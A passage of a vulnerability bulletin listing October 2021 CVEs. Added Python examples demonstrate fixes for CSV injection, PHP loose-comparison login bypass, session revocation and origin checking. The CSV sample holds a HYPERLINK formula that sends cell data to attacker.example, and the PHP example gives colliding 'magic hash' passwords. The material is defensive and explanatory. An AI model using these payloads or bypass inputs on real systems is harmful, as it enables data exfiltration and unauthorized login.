FEDORA
google -- chrome
Use after free in V8 in Google Chrome prior to 94.0.4606.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37975
MISC
MISC
google -- chrome
Inappropriate implementation in Memory in Google Chrome prior to 94.0.4606.71 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37976
MISC
MISC
google -- chrome
Use after free in Safebrowsing in Google Chrome prior to 94.0.4606.71 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37974
MISC
MISC
google -- chrome
Use after free in Portals in Google Chrome prior to 94.0.4606.61 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37973
MISC
MISC
FEDORA
google -- chrome
Out of bounds read in libjpeg-turbo in Google Chrome prior to 94.0.4606.54 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37972
MISC
MISC
FEDORA
FEDORA
google -- chrome
 
Use after free in Offline use in Google Chrome on Android prior to 94.0.4606.54 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-37956
MISC
MISC
FEDORA
google -- chrome
 
Use after free in Indexed DB API in Google Chrome prior to 93.0.4577.82 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-30633
MISC
MISC
FEDORA
google -- chrome
 
Out of bounds memory access in ANGLE in Google Chrome prior to 93.0.4577.82 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-30626
MISC
MISC
FEDORA
google -- chrome
 
Use after free in Selection API in Google Chrome prior to 93.0.4577.82 allowed a remote attacker who convinced the user to visit a malicious website to potentially exploit heap corruption via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-30625
MISC
MISC
FEDORA
google -- chrome
 
Type confusion in Blink layout in Google Chrome prior to 93.0.4577.82 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-30627
MISC
MISC
FEDORA
google -- chrome
 
Stack buffer overflow in ANGLE in Google Chrome prior to 93.0.4577.82 allowed a remote attacker to potentially exploit stack corruption via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-30628
MISC
MISC
FEDORA
google -- chrome
 
Use after free in Permissions in Google Chrome prior to 93.0.4577.82 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-30629
MISC
MISC
FEDORA
google -- chrome
 
Inappropriate implementation in Blink in Google Chrome prior to 93.0.4577.82 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-30630
MISC
MISC
FEDORA
google -- chrome
 
Out of bounds write in V8 in Google Chrome prior to 93.0.4577.82 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.2021-10-08not yet calculatedCVE-2021-30632
MISC
MISC
FEDORA
google -- slo_generator
 
SLO generator allows for loading of YAML files that if crafted in a specific format can allow for code execution within the context of the SLO Generator. We recommend upgrading SLO Generator past https://github.com/google/slo-generator/pull/173 2021-10-04not yet calculatedCVE-2021-22557
CONFIRM
MISC
hashicorp -- nomad_and_nomad_enterprise
HashiCorp Nomad and Nomad Enterprise 1.1.1 through 1.1.5 allowed authenticated users with job submission capabilities to cause denial of service by submitting incomplete job specifications with a Consul mesh gateway and host networking mode. Fixed in 1.1.6.2021-10-07not yet calculatedCVE-2021-41865
MISC
hashicorp -- vault_and_vault_enterprise
 
HashiCorp Vault and Vault Enterprise through 1.7.4 and 1.8.3 allowed a user with write permission to an entity alias ID sharing a mount accessor with another user to acquire this other user’s policies by merging their identities. Fixed in Vault and Vault Enterprise 1.7.5 and 1.8.4.2021-10-08not yet calculatedCVE-2021-41802
MISC
hongcms -- hongcms
 
HongCMS v3.0 contains an arbitrary file read and write vulnerability in the component /admin/index.php/template/edit.2021-10-04not yet calculatedCVE-2020-21431
MISC
hygeia -- hygeia
 
Hygeia is an application for collecting and processing personal and case data in connection with communicable diseases. In affected versions all CSV exports (Statistics & BAG MED) contain a CSV injection vulnerability. Users of the system are able to submit formulas in exported fields, which then get executed upon ingestion of the exported file. There is no validation or sanitization of these formula fields, so a malicious user may construct malicious code. This vulnerability has been resolved in version 1.30.4. There are no workarounds and all users are advised to upgrade their package.2021-10-06not yet calculatedCVE-2021-41128
MISC
MISC
MISC
CONFIRM
MISC
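The Hygeia entry (CVE-2021-41128) is the classic CSV/formula injection: a value a user typed into the application is written verbatim into an export, and a spreadsheet opening that export evaluates it. The Python below is an added example for this bulletin, not Hygeia's code: it shows a defusing step applied at export time, the vulnerable export beside it for comparison, and a parse-back audit check. The sample rows and the HYPERLINK payload are constructed.

```python
import csv
import io

# Characters that spreadsheet applications treat as the start of a formula when
# they appear first in a cell (the application ignores leading whitespace).
FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value):
    """Defuse one exported value so no spreadsheet will evaluate it.

    Real numbers pass through untouched (a negative number is not a formula).
    A string that would be read as a formula is prefixed with a single quote,
    which forces text interpretation; embedded tab and carriage return are
    replaced because some importers treat them as cell or record breaks.
    """
    if isinstance(value, (int, float)) and not isinstance(value, bool):
        return value
    text = "" if value is None else str(value)
    if text.lstrip().startswith(FORMULA_PREFIXES):
        text = "'" + text
    return text.replace("\t", " ").replace("\r", " ")


def export_rows(rows, fieldnames, sanitize=True):
    """Render rows (list of dicts) as CSV text. sanitize=False reproduces the
    vulnerable export: user-supplied fields are written verbatim."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames,
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        cells = {name: row.get(name) for name in fieldnames}
        if sanitize:
            cells = {name: neutralize_cell(v) for name, v in cells.items()}
        writer.writerow(cells)
    return buf.getvalue()


def _looks_numeric(cell):
    try:
        float(cell)
    except ValueError:
        return False
    return True


def is_formula_free(csv_text):
    """Audit check for an export: parse it back and confirm that no non-numeric
    cell begins with a formula trigger."""
    reader = csv.reader(io.StringIO(csv_text))
    return all(_looks_numeric(cell) or not cell.lstrip().startswith(FORMULA_PREFIXES)
               for record in reader for cell in record)


# Constructed sample rows: "name" is a user-submitted field carrying formula
# payloads; "contacts" is a genuine negative number that must survive intact.
SAMPLE_ROWS = [
    {"case_id": 101, "name": '=HYPERLINK("https://attacker.example/?"&A1;"open")',
     "city": "Bern", "contacts": -3},
    {"case_id": 102, "name": "  +SUM(1;1)", "city": "Zürich", "contacts": 4},
]
FIELDS = ["case_id", "name", "city", "contacts"]

if __name__ == "__main__":
    print(export_rows(SAMPLE_ROWS, FIELDS, sanitize=False))
    print(export_rows(SAMPLE_ROWS, FIELDS))
```

The quote prefix is the portable choice because it survives a round trip through the CSV writer's own quoting; stripping the trigger characters instead changes user data and still leaves values such as `\t=1+1` for importers that treat a tab as a separator.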
ibm -- app_connect_enterprise_certified_container
 
IBM App Connect Enterprise Certified Container 1.0, 1.1, 1.2, 1.3, 1.4 and 1.5 could disclose sensitive information to a local user when it is configured to use an IBM Cloud API key to connect to cloud-based connectors. IBM X-Force ID: 207630.2021-10-08not yet calculatedCVE-2021-29906
CONFIRM
XF
ibm -- sterling_b2b_integrator
 
IBM Sterling B2B Integrator 5.2.0.0 through 6.1.1.0 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 199246.2021-10-07not yet calculatedCVE-2021-20571
XF
CONFIRM
ibm -- sterling_b2b_integrator_standard_edition
 
IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.1.1.0 could allow an authenticated attacker to obtain sensitive information from configuration files that could aid in further attacks against the system. IBM X-Force ID: 200656.2021-10-07not yet calculatedCVE-2021-29700
CONFIRM
XF
ibm -- sterling_b2b_integrator_standard_edition
 
IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.1.1.0 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 210171.2021-10-06not yet calculatedCVE-2021-38925
CONFIRM
XF
ibm -- sterling_b2b_integrator_standard_edition
 
IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.1.1.0 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 203734.2021-10-06not yet calculatedCVE-2021-29798
CONFIRM
XF
ibm -- sterling_b2b_integrator_standard_edition
 
IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.1.1.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204912.2021-10-06not yet calculatedCVE-2021-29836
CONFIRM
XF
ibm -- sterling_b2b_integrator_standard_edition
 
IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.1.1.0 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 204913.2021-10-06not yet calculatedCVE-2021-29837
XF
CONFIRM
ibm -- sterling_b2b_integrator_standard_edition
 
IBM Sterling B2B Integrator Standard Edition 5.2.0.0 through 6.1.1.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 205684.2021-10-06not yet calculatedCVE-2021-29855
XF
CONFIRM
ibm -- sterling_b2b_integrator_standard_edition
 
IBM Sterling B2B Integrator Standard Edition 5.2.6.0 through 6.1.1.0 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 207506.2021-10-06not yet calculatedCVE-2021-29903
CONFIRM
XF
ibm -- sterling_file_gateway
 
IBM Sterling File Gateway 2.2.0.0 through 6.1.1.0 could allow an authenticated user to intercept and replace a message sent by another user due to improper access controls. IBM X-Force ID: 195567.2021-10-07not yet calculatedCVE-2021-20375
CONFIRM
XF
ibm -- sterling_file_gateway
 
IBM Sterling File Gateway 2.2.0.0 through 6.1.1.0 could allow an authenticated user to obtain sensitive information due to improper permission control. IBM X-Force ID: 186090.2021-10-08not yet calculatedCVE-2020-4654
CONFIRM
XF
ibm -- sterling_file_gateway
 
IBM Sterling File Gateway 2.2.0.0 through 6.1.1.0 could allow a remote authenticated user to cause a denial of another user's service due to insufficient permission checking. IBM X-Force ID: 195518.2021-10-07not yet calculatedCVE-2021-20372
XF
CONFIRM
ibm -- sterling_file_gateway
 
IBM Sterling File Gateway 6.0.0.0 through 6.1.1.0 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 199170.2021-10-07not yet calculatedCVE-2021-20552
CONFIRM
XF
ibm -- sterling_file_gateway
 
IBM Sterling File Gateway 2.2.0.0 through 6.1.1.0 could allow an authenticated attacker to enumerate usernames due to there being an observable discrepancy in returned messages. IBM X-Force ID: 195568.2021-10-07not yet calculatedCVE-2021-20376
CONFIRM
XF
ibm -- sterling_file_gateway
 
IBM Sterling File Gateway 2.2.0.0 through 6.1.1.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 197503.2021-10-07not yet calculatedCVE-2021-20481
CONFIRM
XF
ibm -- sterling_file_gateway
 
IBM Sterling File Gateway 2.2.0.0 through 6.1.1.0 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 197790.2021-10-07not yet calculatedCVE-2021-20489
XF
CONFIRM
ibm -- sterling_file_gateway
 
IBM Sterling File Gateway 2.2.0.0 through 6.1.1.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 199230.2021-10-07not yet calculatedCVE-2021-20561
XF
CONFIRM
ibm -- sterling_file_gateway
 
IBM Sterling File Gateway 2.2.0.0 through 6.1.1.0 could allow a remote attacker to upload arbitrary files, caused by improper access controls. IBM X-Force ID: 199397.2021-10-07not yet calculatedCVE-2021-20584
CONFIRM
XF
ibm -- sterling_file_gateway
 
IBM Sterling File Gateway User Interface 2.2.0.0 through 6.1.1.0 does not invalidate session after logout which could allow an authenticated user to impersonate another user on the system. IBM X-Force ID: 196944.2021-10-07not yet calculatedCVE-2021-20473
CONFIRM
XF
ibm -- ts7700_management_interface
 
The IBM TS7700 Management Interface is vulnerable to unauthenticated access. By accessing a specially-crafted URL, an attacker may gain administrative access to the Management Interface without authentication. IBM X-Force ID: 207747.2021-10-06not yet calculatedCVE-2021-29908
CONFIRM
XF
icehrm -- icehrm
 
IceHrm 30.0.0 OS has a session management issue: signing out of an admin account does not invalidate an admin session that is open in a different browser.2021-10-04not yet calculatedCVE-2021-38823
MISC
integria_ims -- integria_ims
Integria IMS in its 5.0.92 version does not filter correctly some fields related to the login.php file. An attacker could exploit this vulnerability in order to perform a cross-site scripting attack (XSS).2021-10-07not yet calculatedCVE-2021-3834
CONFIRM
CONFIRM
integria_ims -- integria_ims
 
Integria IMS in its 5.0.92 version is vulnerable to a Remote Code Execution attack through file uploading. An unauthenticated attacker could abuse the AsyncUpload() function in order to exploit the vulnerability.2021-10-07not yet calculatedCVE-2021-3832
CONFIRM
CONFIRM
integria_ims -- integria_ims
 
Integria IMS login check uses a loose comparator ("==") to compare the MD5 hash of the password provided by the user and the MD5 hash stored in the database. An attacker with a specific formatted password could exploit this vulnerability in order to login in the system with different passwords.2021-10-07not yet calculatedCVE-2021-3833
CONFIRM
CONFIRM
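The loose-comparison entry above (CVE-2021-3833) is PHP type juggling: `==` between two strings that both look numeric compares them as numbers, and an MD5 hex digest of the form `0e` followed only by digits is the numeric string 0 × 10^N, equal to every other such digest. The Python below is an added example for this bulletin, not Integria IMS code. It emulates PHP's numeric-string rule for `==` (an assumption stated in the comments, not a PHP interpreter), shows two constructed passwords whose MD5 digests collide under that rule, and contrasts the flawed check with an exact, constant-time comparison.

```python
import hashlib
import hmac
import re

# Emulation of PHP's "numeric string" rule: optional surrounding whitespace,
# optional sign, digits with an optional fraction, optional exponent. When both
# operands of == are numeric strings, PHP compares them as numbers, not text.
_PHP_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def php_loose_equals(a, b):
    """Emulate PHP's `$a == $b` for two strings (the comparison the login used)."""
    if _PHP_NUMERIC.match(a) and _PHP_NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def is_magic_hash(hexdigest):
    """True when a hex digest has the form 0e<digits>: as a numeric string it is
    0 x 10^N, so every such digest compares loosely equal to every other one."""
    return re.fullmatch(r"0e\d+", hexdigest) is not None


def vulnerable_login(password, stored_md5):
    """The flawed check: loose == between md5(supplied) and the stored digest."""
    candidate = hashlib.md5(password.encode()).hexdigest()
    return php_loose_equals(candidate, stored_md5)


def strict_login(password, stored_md5):
    """Minimal fix: exact, constant-time comparison of the two digests. A full
    fix also replaces unsalted MD5 with a password hash such as bcrypt or Argon2."""
    candidate = hashlib.md5(password.encode()).hexdigest()
    return hmac.compare_digest(candidate, stored_md5)


# Constructed sample: two different strings whose MD5 hex digests both have the
# 0e<digits> shape. If a victim's password is the first, the second logs in.
VICTIM_PASSWORD = "240610708"
ATTACKER_PASSWORD = "QNKCDZO"
STORED_DIGEST = hashlib.md5(VICTIM_PASSWORD.encode()).hexdigest()

if __name__ == "__main__":
    print("stored  :", STORED_DIGEST)
    print("attacker:", hashlib.md5(ATTACKER_PASSWORD.encode()).hexdigest())
    print("loose == accepts attacker :", vulnerable_login(ATTACKER_PASSWORD, STORED_DIGEST))
    print("strict compare accepts it :", strict_login(ATTACKER_PASSWORD, STORED_DIGEST))
```

In PHP itself the equivalent fix is `hash_equals($stored, md5($supplied))` or `===`; the real remediation is `password_hash()`/`password_verify()`, which never exposes a comparable digest to the application.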
intelliants -- subrion_cms
 
A SQL injection vulnerability exists in Subrion CMS v4.2.1 in the visual-mode.2021-10-08not yet calculatedCVE-2021-41947
MISC
jeecms -- jeecms
 
JEECMS x1.1 contains a stored cross-site scripting (XSS) vulnerability in the component of /member-vipcenter.htm, which allows attackers to execute arbitrary web scripts or HTML via a crafted payload.2021-10-07not yet calculatedCVE-2020-21729
MISC
jenkins -- git_plugin
 
Jenkins Git Plugin 4.8.2 and earlier does not escape the Git SHA-1 checksum parameters provided to commit notifications when displaying them in a build cause, resulting in a stored cross-site scripting (XSS) vulnerability.2021-10-06not yet calculatedCVE-2021-21684
CONFIRM
MLIST
jenkins -- jenkins
 
Jenkins 2.314 and earlier, LTS 2.303.1 and earlier accepts names of jobs and other entities with a trailing dot character, potentially replacing the configuration and data of other entities on Windows.2021-10-06not yet calculatedCVE-2021-21682
CONFIRM
MLIST
jenkins -- jenkins
 
The file browser in Jenkins 2.314 and earlier, LTS 2.303.1 and earlier may interpret some paths to files as absolute on Windows, resulting in a path traversal vulnerability allowing attackers with Overall/Read permission (Windows controller) or Job/Workspace permission (Windows agents) to obtain the contents of arbitrary files.2021-10-06not yet calculatedCVE-2021-21683
CONFIRM
MLIST
lancom -- lcos
 
In LCOS 10.40 to 10.42.0473-RU3 with SNMPv3 enabled on LANCOM devices, changing the password of the root user via the CLI does not change the password of the root user for SNMPv3 access. (However, changing the password of the root user via LANconfig does change the password of the root user for SNMPv3 access.)2021-10-07not yet calculatedCVE-2021-33903
MISC
laravel -- booking_system_booking_core
 
Laravel Booking System Booking Core 2.0 has a session management flaw. A password change at sandbox.bookingcore.org/user/profile/change-password does not invalidate a session that is open in a different browser.2021-10-04not yet calculatedCVE-2021-37333
MISC
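Three entries in this section are the same defect seen from different sides: logout does not revoke the session on the server (IceHrm, CVE-2021-38823; IBM Sterling File Gateway, CVE-2021-20473) and a password change leaves sessions in other browsers alive (Booking Core, CVE-2021-37333). The Python below is an added example for this bulletin, not code from any of those products: a minimal server-side session store in which logout deletes the session record and a password change bumps a per-user password version that every existing session is checked against. The PBKDF2 password storage and the in-memory dicts are assumptions made so the example runs stand-alone.

```python
import hashlib
import hmac
import os
import secrets


class SessionStore:
    """Server-side sessions that are revoked on logout and on password change.

    Each session records the password version it was created under; bumping
    the version on a password change invalidates every session of that user at
    once, including those open in other browsers."""

    def __init__(self):
        self._users = {}       # user -> (salt, pbkdf2 digest, password_version)
        self._sessions = {}    # session id -> (user, password_version)

    @staticmethod
    def _hash(password, salt):
        return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

    def register(self, user, password):
        salt = os.urandom(16)
        self._users[user] = (salt, self._hash(password, salt), 1)

    def _verify(self, user, password):
        record = self._users.get(user)
        if record is None:
            return False
        salt, digest, _version = record
        return hmac.compare_digest(self._hash(password, salt), digest)

    def login(self, user, password):
        """Return a fresh, unguessable session id, or None on bad credentials."""
        if not self._verify(user, password):
            return None
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = (user, self._users[user][2])
        return sid

    def resolve(self, sid):
        """Map a session id to its user, or None if unknown or revoked."""
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        user, version = entry
        if version != self._users[user][2]:
            self._sessions.pop(sid, None)     # created before a password change
            return None
        return user

    def logout(self, sid):
        """Revoke the session server-side, not merely clear the client cookie."""
        self._sessions.pop(sid, None)

    def change_password(self, sid, old_password, new_password):
        """Re-verify the old password, bump the version (revoking every existing
        session of the user) and hand back one new session for the caller."""
        user = self.resolve(sid)
        if user is None or not self._verify(user, old_password):
            return None
        salt = os.urandom(16)
        _, _, version = self._users[user]
        self._users[user] = (salt, self._hash(new_password, salt), version + 1)
        self._sessions = {s: v for s, v in self._sessions.items() if v[0] != user}
        return self.login(user, new_password)
```

The version check in resolve() is what makes the scheme hold for sessions stored outside the application's own table (a cache, a signed cookie): even a session record the server cannot enumerate is rejected once the user's version has moved on.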
laravel -- booking_system_booking_core
 
Laravel Booking System Booking Core 2.0 is vulnerable to cross-site scripting (XSS). The avatar upload in the My Profile section can be abused to upload a malicious SVG file that contains JavaScript. If another user or admin views the profile and clicks to view the avatar, the XSS triggers.2021-10-04not yet calculatedCVE-2021-37330
MISC
laravel -- booking_system_booking_core
 
Laravel Booking System Booking Core 2.0 is vulnerable to Incorrect Access Control. On the Verifications page, after uploading an ID Card or Trade License and viewing it, ID Cards and Trade Licenses of other vendors/users can be viewed by changing the URL.2021-10-04not yet calculatedCVE-2021-37331
MISC
lcds_laquis_scada -- lcds_laquis_scada
 
LCDS LAquis SCADA through 4.3.1.1085 is vulnerable to a control bypass and path traversal. If an attacker can get a victim to load a malicious els project file and use the play feature, then the attacker can bypass a consent popup and write arbitrary files to OS locations where the user has permission, leading to code execution.2021-10-04not yet calculatedCVE-2021-41579
MISC
liftoff -- gate_one
 
An issue in Gate One 1.2.0 allows attackers to bypass the verification check done by the origins list and connect to Gate One instances from hosts not on the origins list.2021-10-06not yet calculatedCVE-2020-19003
MISC
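The Gate One entry (CVE-2020-19003) describes an origin allow-list that can be bypassed; the page does not say how, and the Python below does not claim to reproduce Gate One's check. It is an added example for this bulletin showing what an origin check has to do to be bypass-resistant: normalize the request's Origin header to an exact (scheme, host, port) triple and compare it for equality with the configured list. The substring variant at the end is a constructed illustration of the weak pattern that the exact match replaces, and the allowed origins in the usage are assumptions.

```python
from urllib.parse import urlsplit


def normalize_origin(origin):
    """Parse an Origin value into (scheme, host, port) or raise ValueError.
    Anything beyond scheme://host[:port] (path, query, credentials) is rejected,
    so "https://evil.net/?https://gate.example.com" can never normalize."""
    parts = urlsplit(origin.strip())
    if parts.scheme not in ("http", "https", "ws", "wss") or not parts.hostname:
        raise ValueError("not an http(s)/ws(s) origin")
    if parts.path not in ("", "/") or parts.query or parts.fragment \
            or parts.username is not None:
        raise ValueError("origin must be scheme://host[:port] only")
    default_port = 443 if parts.scheme in ("https", "wss") else 80
    return parts.scheme, parts.hostname.lower(), parts.port or default_port


def origin_allowed(origin_header, allowed_origins):
    """Exact-match check: the request origin is accepted only if its normalized
    (scheme, host, port) triple equals one of the configured origins."""
    try:
        requested = normalize_origin(origin_header)
    except ValueError:        # unparsable, "null", bad port, extra components
        return False
    allowed = {normalize_origin(o) for o in allowed_origins}
    return requested in allowed


def substring_origin_check(origin_header, allowed_origins):
    """The flawed pattern the exact match replaces: any configured origin that
    appears anywhere inside the header string counts as a match."""
    return any(o in origin_header for o in allowed_origins)


if __name__ == "__main__":
    ALLOWED = ["https://gate.example.com", "wss://gate.example.com:8443"]
    for probe in ("https://gate.example.com",
                  "https://gate.example.com.attacker.net",
                  "https://attacker.net/?https://gate.example.com"):
        print(f"{probe:50} exact={origin_allowed(probe, ALLOWED)} "
              f"substring={substring_origin_check(probe, ALLOWED)}")
```

A browser sends `Origin: null` for sandboxed or file-scheme pages; the exact check rejects it, which is the right default for a terminal-in-browser service.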
lightning_network -- blockstream_c-lightning
 
Blockstream c-lightning through 0.10.1 allows loss of funds because of dust HTLC exposure.2021-10-04not yet calculatedCVE-2021-41592
MISC
MISC
MISC
MISC
MISC
lightning_network -- lightning_labs
 
Lightning Labs lnd before 0.13.3-beta allows loss of funds because of dust HTLC exposure.2021-10-04not yet calculatedCVE-2021-41593
MISC
MISC
MISC
MISC
MISC
MISC
limesurvey -- limesurvey
 
The "File upload question" functionality in LimeSurvey 3.x-LTS through 3.27.18 allows XSS in assets/scripts/modaldialog.js and assets/scripts/uploader.js.2021-10-08not yet calculatedCVE-2021-42112
MISC
MISC
linux -- linux_kernel
 
The decode_data function in drivers/net/hamradio/6pack.c in the Linux kernel before 5.13.13 has a slab out-of-bounds write. Input from a process that has the CAP_NET_ADMIN capability can lead to root access.2021-10-05not yet calculatedCVE-2021-42008
MISC
MISC
MISC
maian_cart -- maian_cart
 
Maian Cart v3.8 contains a pre-authentication remote code execution (RCE) vulnerability via a broken access control issue in the Elfinder plugin.2021-10-07not yet calculatedCVE-2021-32172
MISC
MISC
MISC
MISC
mediawiki -- mediawiki
 
An issue was discovered in Special:MediaSearch in the MediaSearch extension in MediaWiki through 1.36.2. The suggestion text (a parameter to mediasearch-did-you-mean) was not being properly sanitized and allowed for the injection and execution of HTML and JavaScript via the intitle: search operator within the query.2021-10-06not yet calculatedCVE-2021-42043
MISC
MISC
mediawiki -- mediawiki
 
An issue was discovered in SpecialEditGrowthConfig in the GrowthExperiments extension in MediaWiki through 1.36.2. The growthexperiments-edit-config-error-invalid-title MediaWiki message was not being properly sanitized and allowed for the injection and execution of HTML and JavaScript.2021-10-06not yet calculatedCVE-2021-42042
MISC
MISC
mediawiki -- mediawiki
 
An issue was discovered in CentralAuth in MediaWiki through 1.36.2. The rightsnone MediaWiki message was not being properly sanitized and allowed for the injection and execution of HTML and JavaScript via the setchange log.2021-10-06not yet calculatedCVE-2021-42041
MISC
MISC
mediawiki -- mediawiki
 
An issue was discovered in MediaWiki through 1.36.2. A parser function related to loop control allowed for an infinite loop (and php-fpm hang) within the Loops extension because egLoopsCountLimit is mishandled. This could lead to memory exhaustion.2021-10-06not yet calculatedCVE-2021-42040
MISC
MISC
mediawiki -- mediawiki
 
The DynamicPageList3 extension is a reporting tool for MediaWiki, listing category members and intersections with various formats and details. In affected versions unsanitised regular expression input within the parameters of the DPL parser function allowed for the possibility of ReDoS (Regex Denial of Service). This has been resolved in version 3.3.6. If you are unable to update you may also set `$wgDplSettings['functionalRichness'] = 0;` or disable DynamicPageList3 to mitigate.2021-10-04not yet calculatedCVE-2021-41118
MISC
MISC
CONFIRM
mediawiki -- mediawiki
 
An issue was discovered in the Mentor dashboard in the GrowthExperiments extension in MediaWiki through 1.36.2. The Growthexperiments-mentor-dashboard-mentee-overview-add-filter-total-edits-headline, growthexperiments-mentor-dashboard-mentee-overview-add-filter-starred-headline, growthexperiments-mentor-dashboard-mentee-overview-info-text, growthexperiments-mentor-dashboard-mentee-overview-info-legend-headline, and growthexperiments-mentor-dashboard-mentee-overview-active-ago MediaWiki messages were not being properly sanitized and allowed for the injection and execution of HTML and JavaScript.2021-10-06not yet calculatedCVE-2021-42044
MISC
MISC
meross -- msg100_devices
 
Meross MSG100 devices before 3.2.3 allow an attacker to replay the same data or similar data (e.g., an attacker who sniffs a Close message can transmit an acceptable Open message).2021-10-07not yet calculatedCVE-2021-35067
MISC
MISC
mitsubishi_electric -- got_and_tension_controller
 
Improper Input Validation vulnerability in GOT2000 series GT21 model GT2107-WTBD all versions, GT2107-WTSD all versions, GT2104-RTBD all versions, GT2104-PMBD all versions, GT2103-PMBD all versions, GOT SIMPLE series GS21 model GS2110-WTBD all versions, GS2107-WTBD all versions, GS2110-WTBD-N all versions, GS2107-WTBD-N all versions and LE7-40GU-L all versions allows a remote unauthenticated attacker to cause a DoS condition of the products by sending specially crafted packets.2021-10-07not yet calculatedCVE-2021-20605
MISC
MISC
mitsubishi_electric -- got_and_tension_controller
 
Improper Input Validation vulnerability in GOT2000 series GT21 model GT2107-WTBD all versions, GT2107-WTSD all versions, GT2104-RTBD all versions, GT2104-PMBD all versions, GT2103-PMBD all versions, GOT SIMPLE series GS21 model GS2110-WTBD all versions, GS2107-WTBD all versions, GS2110-WTBD-N all versions, GS2107-WTBD-N all versions and LE7-40GU-L all versions allows a remote unauthenticated attacker to cause a DoS condition of the products by sending specially crafted packets.2021-10-07not yet calculatedCVE-2021-20604
MISC
MISC
mitsubishi_electric -- got_and_tension_controller
 
Improper Handling of Exceptional Conditions vulnerability in GOT2000 series GT21 model GT2107-WTBD all versions, GT2107-WTSD all versions, GT2104-RTBD all versions, GT2104-PMBD all versions, GT2103-PMBD all versions, GOT SIMPLE series GS21 model GS2110-WTBD all versions, GS2107-WTBD all versions, GS2110-WTBD-N all versions, GS2107-WTBD-N all versions and LE7-40GU-L all versions allows a remote unauthenticated attacker to cause a DoS condition of the products by sending specially crafted packets.2021-10-07not yet calculatedCVE-2021-20602
MISC
MISC
mitsubishi_electric -- got_and_tension_controller 
 
Improper Input Validation vulnerability in GOT2000 series GT21 model GT2107-WTBD all versions, GT2107-WTSD all versions, GT2104-RTBD all versions, GT2104-PMBD all versions, GT2103-PMBD all versions, GOT SIMPLE series GS21 model GS2110-WTBD all versions, GS2107-WTBD all versions, GS2110-WTBD-N all versions, GS2107-WTBD-N all versions and LE7-40GU-L all versions allows a remote unauthenticated attacker to cause a DoS condition of the products by sending specially crafted packets.2021-10-07not yet calculatedCVE-2021-20603
MISC
MISC
mitsubishi_electric -- melsec_iq-r_series_c_controller_module_r12ccpu-v
 
Uncontrolled resource consumption in MELSEC iQ-R series C Controller Module R12CCPU-V all versions allows a remote unauthenticated attacker to cause a denial-of-service (DoS) condition by sending a large number of packets in a short time while the module is starting up.2021-10-08not yet calculatedCVE-2021-20600
MISC
MISC
MISC
mkdocs -- mkdocs
 
** DISPUTED ** The mkdocs 1.2.2 built-in dev-server allows directory traversal using port 8000, enabling remote exploitation to obtain sensitive information. NOTE: the vendor has disputed this as described in https://github.com/mkdocs/mkdocs/issues/2601 and https://github.com/nisdn/CVE-2021-40978/issues/1.2021-10-07not yet calculatedCVE-2021-40978
MISC
MISC
MISC
MISC
moby -- moby
 
